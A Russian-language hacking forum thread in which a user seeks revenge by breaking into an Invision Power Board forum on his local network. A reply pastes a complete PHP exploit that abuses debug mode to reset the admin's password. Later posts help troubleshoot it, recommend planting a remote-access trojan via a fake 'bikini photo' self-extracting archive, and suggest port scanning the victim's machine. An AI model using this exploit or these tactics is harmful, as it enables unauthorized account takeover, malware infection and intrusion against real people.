Здравствуйте! У меня парочка вопросов... 1. Подскажите сниффер для локалки чтобы взломать IPB!? 2. Есть простой способ взлома IPB? Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !
Русская версия Invision Power Board v2.1.7 © 2007 IPS, Inc. И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!
может поможет PHP: <?php /* Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy... // $proxy = "1.2.3.4:8080"; // ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name); $pass = urlencode($pass); $curl = curl_init($site.'act=Reg&CODE=10'); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?> # milw0rm.com [2006-11-01]
хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить? (извени за тупость если что не так...спасибо что помогаеш)
Как ты понимаеш варианта два: либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке: This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on Менять там нужно только прокси, он по дефолту выключен.
Акуна матата: Я без понятия.... it's my: Попробывал пишет: Error: Probably not vulnerable, or no forum found Почитал то что ты сказал там сразу написал http://192.168.2.24/forum//ips_kernel/PEAR/ открылась типо ftp ну вот: Index of /forum//ips_kernel/PEAR Name Last modified Size Description Parent Directory - Text/ 01-Nov-2007 22:49 - lgpl.txt 18-Jul-2006 18:56 26K Apache/2.2.4 (Win32) PHP/5.2.1 Server at 192.168.2.24 Port 80 Папка: Text,lgpl.txt - тут::: GNU LESSER GENERAL PUBLIC LICENSE Version 2.1, February 1999 Copyright (C) 1991, 1999 Free Software Foundation, Inc. ну и т.д в папке text файлы: Diff.php,Diff3.php,lgpl.txt,package.xml там ещё папка Diff в ней Renderer.php и папка Renderer а в ней inline.php и unified.php т.е. в папки какието могу заходить...это и есть уязвимость? что мне делать подскажи...
это не уязвимсоть, но хорошо что возможно ПО Apache/2.2.4 (Win32) PHP/5.2.1 значит так, ты в нет лезешь через локалку или у тя свой доступ?
Как я понял в роли сервака у тебя выступает винда + скорее всего пакет денвера, попробуй втулить телу чья это машина PraRat, или другого руткита. Ну типа пошли ему адрес с картинками, типа: "зацени это я твоя чикса в купальнике вместе с подружкой", кинь на ftpпочти в любой локалке есть ftp), и прибацай картинку от Wira SFX.
Самораспаковыюшийся архив.Ладно этот способ отпадает. Запусти паука(сканер безапасности такой есть), пускай просканет на наличие открытых портов, может есть какие нибудь шары на той машине. Хотя бы узнай что за винда там крутится.
так и называеться "паук" ? или spider ? где скачать? (можеш не говорить если не знаеш сам найду =)) наверно"!